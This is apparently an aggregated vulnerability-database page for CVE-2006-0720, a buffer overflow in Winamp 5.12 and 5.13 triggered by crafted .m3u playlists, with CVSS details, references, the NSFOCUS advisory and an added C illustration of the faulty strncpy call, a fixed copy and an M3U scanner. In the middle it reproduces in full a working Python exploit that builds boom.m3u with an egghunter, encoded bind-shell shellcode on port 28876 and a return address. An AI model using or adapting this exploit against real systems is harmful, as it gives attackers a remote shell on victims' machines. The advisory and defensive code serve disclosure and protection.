CVE-2006-0720
CVSS 7.6
Published: 2006-02-23 16:02:00
Revised: 2008-09-05 17:00:02

[Original] Stack-based buffer overflow in Nullsoft Winamp 5.12 and 5.13 allows user-assisted attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted .m3u file that causes an incorrect strncpy function call when the player pauses or stops the file.


[CNNVD] Nullsoft Winamp M3U File Processing Static Buffer Overflow Vulnerability (CNNVD-200602-365)

        Winamp is a popular media player that supports many file formats.
        Winamp contains a buffer overflow when it processes entries in .m3u playlist files; an attacker may exploit it to execute arbitrary instructions on the user's machine.
        Winamp can play the files listed in a loaded .m3u playlist. When playback of a file stops, Winamp resets the program title, and there it calls strncpy() incorrectly, overflowing a fixed-size buffer (the NSFOCUS advisory calls it a static buffer; NVD classifies the issue as stack-based). By crafting a malicious .m3u playlist an attacker can crash the victim's Winamp, and remote code execution is also possible.

- CVSS (base score)

CVSS score: 7.6 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be fully compromised]
Availability impact: COMPLETE [may take the system down entirely]
Access complexity: HIGH [exploitation requires specific access conditions]
Access vector: NETWORK [the attacker needs neither intranet nor local access]
Authentication: NONE [no authentication is required to exploit]

- CPE (affected platforms and products)

cpe:/a:nullsoft:winamp:5.12  Nullsoft Winamp 5.12
cpe:/a:nullsoft:winamp:5.13  Nullsoft Winamp 5.13

- OVAL (technical details for detection)

No matching OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0720
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0720
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200602-365
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/16785
(PATCH)  BID  16785
http://securitytracker.com/id?1015675
(PATCH)  SECTRACK  1015675
http://www.securityfocus.com/archive/1/archive/1/425888/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060223 NSFOCUS SA2006-01 : Winamp m3u File Processing Buffer Overflow Vulnerability
http://www.nsfocus.com/english/homepage/research/0601.htm
(UNKNOWN)  MISC  http://www.nsfocus.com/english/homepage/research/0601.htm
http://forums.winamp.com/showthread.php?threadid=238648
(UNKNOWN)  CONFIRM  http://forums.winamp.com/showthread.php?threadid=238648
http://xforce.iss.net/xforce/xfdb/24740
(UNKNOWN)  XF  winamp-m3u-wma-bo(24740)
http://securityreason.com/securityalert/476
(UNKNOWN)  SREASON  476

- Vulnerability information

Nullsoft Winamp M3U File Processing Static Buffer Overflow Vulnerability
High severity  Buffer overflow
Published 2006-02-23 00:00:00  Updated 2007-02-27 00:00:00
Remote

- Advisories and patches

        The vendor has released an upgrade that fixes this issue; download it from the vendor's site:
        http://www.winamp.com/player

- Vulnerability information (26245)

Winamp 5.12 (.m3u) - Stack Based Buffer Overflow (EDB-ID: 26245)
2013-06-17  Not verified
superkojiman
# Exploit Title: Winamp 5.12 .m3u stack based buffer overflow
# Date: 16 June 2013
# Exploit Author: superkojiman - http://www.techorganic.com
# Vendor Homepage: http://www.winamp.com/
# Software Link: http://www.oldapps.com/winamp.php?old_winamp=211
# Version: 5.12
# Tested on: Windows XP Professional SP2, English
# CVE: CVE-2006-0720
# BID: 16785
#
# Description from CVE-2006-0720
# Stack-based buffer overflow in Nullsoft Winamp 5.12 and 5.13
# allows user-assisted attackers to cause a denial of service
# (crash) and possibly execute arbitrary code via a crafted
# .m3u file that causes an incorrect strncpy function call
# when the player pauses or stops the file.
#
#
# 1. Launch Winamp
# 2. Drag boom.m3u into Winamp window
# 3. Check for bind shell on port 28876
#
# (Ported here from Python 2 to Python 3: byte strings and a binary
# write, so the payload bytes reach the file unchanged. The original
# wrote in text mode; only the header line endings differ, and Winamp
# accepts both "\n" and "\r\n" in M3U files.)

import struct

# Playlist header; the oversized payload goes on the entry line that follows it.
header = b"#EXTM3U\n"
header += b"#EXTINF:1234,Pwnage Rock\n"

# NtDisplayString egghunter (syscall 0x43): walks memory page by page looking
# for the "w00tw00t" tag and jumps to the bytes that follow it.
egghunter = (
    b"\x90" * 64 +
    b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x43\x58" +
    b"\xcd\x2e\x3c\x05\x5a\x74\xef\xb8" +
    b"\x77\x30\x30\x74" +  # w00t
    b"\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" +
    b"\x90" * 30
)

# Filler and a NOP sled ahead of the egghunter.
junk = b"\x41" * 262 + b"\x90" * 100 + egghunter

# bind shell on port 28876
# https://code.google.com/p/w32-bind-ngs-shellcode/
# msfencode -i w32-bind-ngs-shellcode.bin -b "\x00\x0a\x0d\x5c"
# [*] x86/shikata_ga_nai succeeded with size 241 (iteration=1)
# The tag is doubled ("w00tw00t") because the hunter compares it twice.
shellcode = (
    b"w00tw00t" + b"\x90" * 239 +
    b"\xbf\x26\x63\xb2\x20\xda\xcc\xd9\x74\x24\xf4\x5a\x33\xc9" +
    b"\xb1\x36\x83\xea\xfc\x31\x7a\x10\x03\x7a\x10\xc4\x96\x83" +
    b"\xe9\x6c\xd2\x95\xd9\xe7\x92\x59\x91\x81\x46\xe9\xcb\x65" +
    b"\xfc\x93\x33\xfe\x34\x54\x7b\x18\x4c\x57\xd2\x70\x9c\xc8" +
    b"\xe6\xb2\x88\x90\x5e\xc5\x3b\x35\xe8\xa6\xb5\x5d\x9f\x5e" +
    b"\x70\x5e\x89\x52\x52\xad\x40\x8d\x73\xde\xf9\x10\x2d\x60" +
    b"\xaf\xc5\x9c\xe1\xa0\xc5\xba\xa9\xb5\x48\xff\xbe\x96\x6f" +
    b"\x87\xc1\xcd\x04\x3c\xe2\x10\xf3\x95\xd3\xc0\x41\x91\x20" +
    b"\x74\x44\x4b\xfc\x40\xea\xa7\x8c\x84\x36\xfb\x1f\xa0\x41" +
    b"\x3e\xc7\x3f\x46\x61\x8c\x8b\xbc\x9f\x7b\x04\x0b\x8b\x2a" +
    b"\x90\x38\xa8\xcd\x4f\x37\x38\xce\x8b\xd6\x12\x51\xad\xd1" +
    b"\x11\x5a\x5f\xbf\xdd\x09\xa0\xef\x89\x38\xde\x31\x45\x36" +
    b"\x6e\x13\x04\x47\x40\x06\xa9\x68\xf4\xd9\x79\x77\x08\x56" +
    b"\xb6\xed\xe7\x3f\x14\xa4\xf8\x6f\xe3\x87\x73\x77\xdd\xd5" +
    b"\x2e\xef\x7d\xb7\xaa\xcf\x0c\x3b\x17\x37\xa4\x6f\xfc\x81" +
    b"\xfd\x86\x02\x59\x85\x65\x21\x36\xdb\xc7\x7b\x7e\x9c\x08" +
    b"\x73\x29\x71\x85\xd3\x87\x8a\x7f\x38\xac\x33\x7c\x29\x78" +
    b"\x44\x83\x55"
)

# 022B368C , call ecx , C:\Program Files\Winamp\pxsdkpls.dll
# (a Winamp plugin DLL, so the address is stable on the tested install)
ret = struct.pack("<I", 0x022B368C)

# for some reason eip doesn't get overwritten and Winamp
# crashes differently unless the 4th byte after ret is
# a 0xB0. there's probably an easier way to do this but
# this is what the fuzzer found first so...
wtf = b"\x43\x43\x43\xB0"

# Binary mode: no newline translation, no encoding of the payload bytes.
with open("boom.m3u", "wb") as f:
    f.write(header + junk + shellcode + ret + wtf)

print("Created boom.m3u")
print("1. Open Winamp")
print("2. Drag boom.m3u into Winamp window")
print("3. Check for bind shell on port 28876")

- Vulnerability information (F44166)

NSFOCUS Security Advisory 2006.1 (PacketStorm ID: F44166)
2006-02-26 00:00:00
NSFOCUS, Liu Yexin  nsfocus.com
advisory, overflow, arbitrary
CVE-2006-0720

NSFOCUS Security Advisory - The NSFocus Security Team has discovered a buffer overflow vulnerability when Winamp processes .m3u files, which might cause Winamp to crash or even execute arbitrary code when a user loads a malicious .m3u file and plays it. Affected software includes Nullsoft Winamp version 5.12 and 5.13.

NSFOCUS Security Advisory (SA2006-01)

Winamp m3u File Processing Buffer Overflow Vulnerability

Release Date: 2006-02-23

CVE ID: CVE-2006-0720

http://www.nsfocus.com/english/homepage/research/0601.htm

Affected systems & software
===========================

Nullsoft Winamp 5.12
Nullsoft Winamp 5.13

Unaffected systems & software
=============================

Nullsoft Winamp 5.2

Summary
=========

Winamp is a popular media player that supports various media formats and 
playlist formats, including m3u and pls formats.

NSFocus Security Team discovered a buffer overflow vulnerability when Winamp 
processes .m3u files, which might cause Winamp to crash or even execute 
arbitrary code when a user loads a malicious .m3u file and plays it. 

Description
============

Winamp can play files by loading an .m3u file. When playback is paused or stopped,
Winamp resets the title of the program; there strncpy() is called incorrectly,
resulting in a static buffer overflow.

An attacker can cause Winamp to crash by crafting a malicious .m3u file. 
Remote code execution is possible but difficult.

Workaround
=============

Cancel .m3u file association to Winamp, and do not open untrusted .m3u files. 

Vendor Status
==============

2006.02.13  Informed the vendor.
2006.02.15  The vendor confirmed the vulnerability.
2006.02.21  The vendor released a new version that fixes the vulnerability.

The vendor has released Winamp 5.2 to fix this vulnerability, which is available 
for download at:
http://www.winamp.com/player/
http://forums.winamp.com/showthread.php?threadid=238648

Additional Information
========================

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2006-0720 to this issue. This is a candidate for inclusion in the 
CVE list (http://cve.mitre.org), which standardizes names for security problems.
Candidates may change significantly before they become official CVE entries.

Acknowledgment
===============

Liu Yexin of NSFocus Security Team found the vulnerability.

DISCLAIMER
==========
THE INFORMATION PROVIDED IS RELEASED BY NSFOCUS "AS IS" WITHOUT WARRANTY
OF ANY KIND. NSFOCUS DISCLAIMS ALL WARRANTIES, EITHER EXPRESSED OR IMPLIED,
EXCEPT FOR THE WARRANTIES OF MERCHANTABILITY. IN NO EVENT SHALL NSFOCUS
BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT,
INCIDENTAL,CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES,
EVEN IF NSFOCUS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
DISTRIBUTION OR REPRODUCTION OF THE INFORMATION IS PERMITTED PROVIDED THAT THE
ADVISORY IS NOT MODIFIED IN ANY WAY.

Copyright 1999-2006 NSFOCUS. All Rights Reserved. Terms of use.


NSFOCUS Security Team <security@nsfocus.com>
NSFOCUS INFORMATION TECHNOLOGY CO.,LTD
(http://www.nsfocus.com)
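Added illustration, not Winamp's code and not part of the NSFOCUS advisory or the exploit above: the strncpy() misuse that the CNNVD summary and the advisory's Description section describe, beside a hardened title-reset routine, plus a small M3U line scanner that flags oversized entries before they reach the title code. TITLE_MAX, the function names, the 260-byte threshold in main() (the Windows MAX_PATH value) and the sample playlist are assumptions; the page does not give Winamp's real buffer size or the exact faulty call. The probe functions bound the copy by the destination size, so the demonstration itself never writes out of bounds.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical size of the fixed title buffer; the page does not give Winamp's real size. */
#define TITLE_MAX 64

/* Vulnerable pattern: the bound passed to strncpy() equals the buffer size, so a
 * source of TITLE_MAX bytes or more fills dst with no terminator. Any later
 * strlen()/strcat() on dst then reads or writes past the buffer. (Taking the
 * bound from strlen(src) instead is worse: that is an unbounded strcpy() and
 * writes past dst immediately.) */
void set_title_vulnerable(char *dst, size_t dst_size, const char *src)
{
    strncpy(dst, src, dst_size);
}

/* Hardened: copy at most dst_size - 1 bytes, always terminate, report truncation.
 * Returns 1 if truncated, 0 if not, -1 on bad arguments. */
int set_title_safe(char *dst, size_t dst_size, const char *src)
{
    if (dst == NULL || src == NULL || dst_size == 0)
        return -1;
    size_t n = strlen(src);
    int truncated = n >= dst_size;
    if (truncated)
        n = dst_size - 1;
    memcpy(dst, src, n);
    dst[n] = '\0';
    return truncated;
}

/* Build a source string of n 'A's (capped to fit the caller's buffer). */
static void fill_src(char *src, size_t cap, size_t n)
{
    if (n >= cap)
        n = cap - 1;
    memset(src, 'A', n);
    src[n] = '\0';
}

/* Probe: run the vulnerable copy into a TITLE_MAX buffer and report whether the
 * buffer ended up with no NUL terminator. */
int vulnerable_leaves_unterminated(size_t src_len)
{
    char src[1024], dst[TITLE_MAX];
    fill_src(src, sizeof src, src_len);
    memset(dst, 'X', sizeof dst);
    set_title_vulnerable(dst, sizeof dst, src);
    return memchr(dst, '\0', sizeof dst) == NULL;
}

/* Probe: length of the title the hardened copy produces for src_len 'A's. */
size_t safe_result_len(size_t src_len)
{
    char src[1024], dst[TITLE_MAX];
    fill_src(src, sizeof src, src_len);
    set_title_safe(dst, sizeof dst, src);
    return strlen(dst);
}

/* Length of the longest non-directive line (a path or URL entry) in an M3U text.
 * Directive lines start with '#'; line endings may be \n or \r\n. */
size_t m3u_longest_entry(const char *text)
{
    size_t longest = 0;
    const char *p = text;
    while (*p != '\0') {
        const char *nl = strchr(p, '\n');
        size_t len = nl ? (size_t)(nl - p) : strlen(p);
        if (len > 0 && p[len - 1] == '\r')
            len--;
        if (len > 0 && p[0] != '#' && len > longest)
            longest = len;
        if (nl == NULL)
            break;
        p = nl + 1;
    }
    return longest;
}

/* Loader-side policy check: treat any entry longer than `limit` bytes as hostile
 * and refuse the playlist before it reaches the title code. */
int m3u_is_suspicious(const char *text, size_t limit)
{
    return m3u_longest_entry(text) > limit;
}

int main(void)
{
    /* Constructed sample in the layout of the public exploit file: an EXTINF
     * header followed by one oversized entry (payload replaced by 300 'A's). */
    char entry[301], playlist[400];
    fill_src(entry, sizeof entry, 300);
    snprintf(playlist, sizeof playlist, "#EXTM3U\n#EXTINF:1234,Pwnage Rock\n%s\n", entry);

    printf("longest entry: %zu bytes, suspicious (limit 260): %s\n",
           m3u_longest_entry(playlist), m3u_is_suspicious(playlist, 260) ? "yes" : "no");
    printf("vulnerable copy left the title unterminated: %s\n",
           vulnerable_leaves_unterminated(strlen(entry)) ? "yes" : "no");
    printf("hardened copy produced a %zu-byte title\n", safe_result_len(strlen(entry)));
    return 0;
}
```

The scanner is the same check a gateway or mail filter can apply to playlists: the exploit file above carries a single entry of close to a kilobyte, far beyond any legitimate path length, and refusing it at load time removes the need to reach the title code at all.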
    

- Vulnerability information

ID: 23525
Winamp M3U File Handling Stop/Pause Stack Buffer Overflow
Location / attack type: Context Dependent, Input Manipulation
Impact / solution: Loss of Integrity; Upgrade
Exploit: Public; Vendor Verified

- Vulnerability description

- Timeline

Disclosure date: 2006-02-23
Solution date: 2006-02-21
Discovery date and exploit publication date: unknown

- Solution

Upgrade to version 5.2 or higher, as it has been reported to fix this vulnerability. It is also possible to temporarily work around the flaw by implementing the following workaround: cancel the .m3u file association with Winamp, and do not open untrusted .m3u files.

- References

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

Nullsoft Winamp M3U File Processing Buffer Overflow Vulnerability
Class: Boundary Condition Error  BID: 16785
Remote: Yes  Local: No
Published: 2006-02-23 12:00:00  Updated: 2006-02-24 08:32:00
Discovered by Liu Yexin of NSFocus Security Team and P Robinson.

- Affected versions

NullSoft Winamp 5.13
NullSoft Winamp 5.12

- Unaffected versions

NullSoft Winamp 5.2

- 漏洞讨论


Nullsoft Winamp is prone to a buffer-overflow vulnerability when processing malformed M3U files. The overrun occurs when the M3U playlist is paused or stopped.

This issue is reported to affect Winamp versions 5.12 and 5.13. Earlier versions may also be vulnerable.

- Exploit

At the time of this SecurityFocus entry no public exploit was known: "Currently we are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com". A public exploit (EDB-ID 26245, superkojiman, 2013) has since been released and is reproduced above.

- Solution

This issue has been addressed in Winamp 5.2; users of the following versions should upgrade:

NullSoft Winamp 5.12

NullSoft Winamp 5.13
